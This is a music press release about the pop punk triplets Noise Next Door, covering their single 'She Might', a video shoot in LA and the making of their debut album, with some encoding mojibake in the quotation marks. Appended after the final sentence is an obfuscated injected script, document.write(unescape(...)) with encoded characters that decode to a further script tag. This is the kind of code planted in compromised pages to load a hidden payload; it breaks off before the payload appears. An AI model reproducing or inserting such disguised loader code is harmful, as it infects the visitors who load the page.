After releasing the two fantastic pop punk power singles ‘Lock Up Your Daughters' and ‘Calendar Girl', our favourite triplets have now signed to Warner Bros. Records, and return with a song that is a little more sophisticated than their previous hits! ‘She Might' is an honest and personal track about teenage love and angst, with soaring melodies and an explosive chorus, giving the listener a true emotional insight into the lads.
Bassist Craig explains: “This is a really personal song to us, it shows a different side to the Noise Next Door that people may not know. Our other singles have been really great fun, but it is good to get a chance to show that there is more to us than that.â€
“Yeah,†adds drummer Scott, “The track is about the thrill and the pain of the chase and about waiting for the right girl ….â€
“I can't wait to get out there and perform the tune,†interrupts Ed.
Being triplets, the lads are used to finishing each other's sentences, and they are used to a lot of noise! They grew up in a small terraced house with their parents and four older sisters (yes that's NINE in total!) in Portsmouth, and rehearsed religiously for over four years in their living room using their Dad's PA system….developing their talents on the guitar, bass and drums. “I don't know how our neighbours lived with us to be honest, our Mum and Dad had so many complaints,†says Scott.
The lads have just returned from LA where they were out shooting the video set in a suburban area of North Hollywood. It features an actress from the O.C. as a love interest and they also got to film on the bus from Speed! “It felt like we were shooting a massive feature film we could see the famous Hollywood sign in the background of one of the shoot locations- in a word… incredible†adds Ed.
Noise Next Door's debut album is due to be released on June 13th, and the lads had the opportunity to work with some amazing team of writers and producers. They travelled out to America to write with Greg Alexander (New Radicals), Youth, and Butch Walker (Avril Lavigne) and layed down the final tracks for the album with hot producers John McLaughlin, Simon Perry (Busted, Blue, Liberty X), Steve Robson (Rooster, Blue, Busted) and Simon Gogerly (U2, Gwen Stefani).document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
